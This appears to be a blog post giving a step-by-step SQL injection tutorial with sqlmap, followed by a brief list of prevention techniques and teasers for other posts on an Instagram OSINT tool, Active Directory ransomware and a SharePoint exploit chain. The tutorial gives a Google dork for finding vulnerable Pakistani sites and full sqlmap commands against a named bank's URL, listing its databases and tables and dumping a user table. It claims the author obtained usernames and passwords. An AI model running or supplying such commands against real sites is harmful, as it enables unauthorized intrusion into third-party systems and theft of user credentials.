SQL Injection Using SQLMAP

Requirements:

SQL MAP Script
    https://sqlmap.org/
Python Compiler

Step 1:- Identifying The Target :
Use "Google Dork" To Find The "Target", "Search" For The Following:-
    inurl:.php?id= site:.pk


Step 2:- Checking For The "Vulnerability" In The URL By "Passing ' (Single Quote)".
If It Returns "ERROR" Then Its Hackable.


 

Step 3:- Open Up The "Power Shell" And Navigate To The Folder Where Sqlmap Is Kept.
    Type: python .\sqlmap.py -h To See The Help.

 


Step 4:- Finding Out The Name Of The "Databases Available". Type The Following Command In Power Shell.
    python .\sqlmap.py -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B0219F2C-951C-B9F7-D1B6-805BA07752DB57D" –dbs



Step 5:- Finding Out The "Tables" In It. Type The Following Command.
    python .\sqlmap.py -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B0219F2C-951C-B9F7-D1B6-805BA07752DB57D" -D fcibankc_fci_urdu –tables


 

Retrieved "Table Names".


Step 6:- Dumping The "DATA Inside Table" (Any Table Of Your Interest)
Type The Following Command.
    python .\sqlmap.py -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B0219F2C-951C-B9F7-D1B6-805BA07752DB57D" -D fcibankc_459625_fci -T user --dump



 


 

We Got The Username And Password.


Sql Injection Prevention Techniques:-
Primary Defenses:-

Option 1: Use Of Prepared Statements (With Parameterized Queries).
Option 2: Use Of Stored Procedures.
Option 3: Whitelist Input Validation.
Option 4: Escaping All User Supplied Input.

Additional Defenses:-

Also: Enforcing Least Privilege.
Also: Performing Whitelist Input Validation As A Secondary Defense.

Comments

Post a Comment

Popular posts from this blog

OSINT Tool in Termux

Image
The Instagram OSINT Tool gets a range of information from an Instagram account that you normally wouldn't be able to get from just looking at their profile The information includes: [ profile ] : user id, followers / following, number of uploads, profile img URL, business enum, external URL, joined Recently, etc [ tags & mentions ] : most used hashtags and mentioned accounts [ email ] : if any email is used any where it'll be displayed [ posts ] : accessability caption, location, timestamp, caption, picture url, etc ( yet not working correctly with posts instagram marks as 'sensitive cotent' ) How To Install apt update && upgrade -y Pkg install git pkg install python3 git clone https://github.com/th3unkn0n/osi.ig.git && cd osi.ig python3 -m pip install -r requirements.txt Usage python3 main.py -u username
Read more

Active Directory Ransomware Attacks

Image
    Organizations worldwide use Active Directory (AD) as their primary identity service , which makes it a top target for ransomware attacks . This article explains how adversaries exploit Active Directory during ransomware attacks and provides strategies and tools for defending against this modern menace. The two phases of a ransomware attack A common misconception about ransomware attacks is that they are quick: Someone opens an infected email attachment or inserts an infected USB device , and within minutes data across the network is encrypted and a ransom demand is displayed on every screen . The reality is quite different. Ransomware attacks today tend to be quite sophisticated and methodical . To encrypt as much sensitive information as possible and therefore maximize the chances of receiving a high payout , attackers proceed in two phases: Find an entry point — The first step is to gain a foothold in the victim organization ’s network . One common strategy is to comp...
Read more

Colt Telecom Hit by WarLock Ransomware: SharePoint Zero Day Used for Mass Data Theft

Image
  What Happened On August 12, 2025 , Colt Technology Services—a UK-based telecom giant—experienced a cyberattack that disrupted several internal support services, impacting systems like Colt Online, porting, and Voice API platforms, while core network services remained unaffected. Who Claimed Responsibility A threat actor using the handle "cnkjasdfgd," claiming to represent the WarLock ransomware group , offered 1 million stolen documents for US$200,000 , providing sample files to prove their legitimacy. Made Possible By The attackers exploited a critical zero-day vulnerability in on-premises Microsoft SharePoint (CVE‑2025‑53770), which was publicly patched on July 21, 2025. Technical Breakdown (“ToolShell” Exploit Chain) Attackers used a sophisticated exploit chain now dubbed ToolShell , involving multiple steps: 1. Initial Access – Bypassing Authentication A crafted HTTP POST to the /_layouts/15/ToolPane.aspx endpoint with a spoofed Referer header (/_layo...
Read more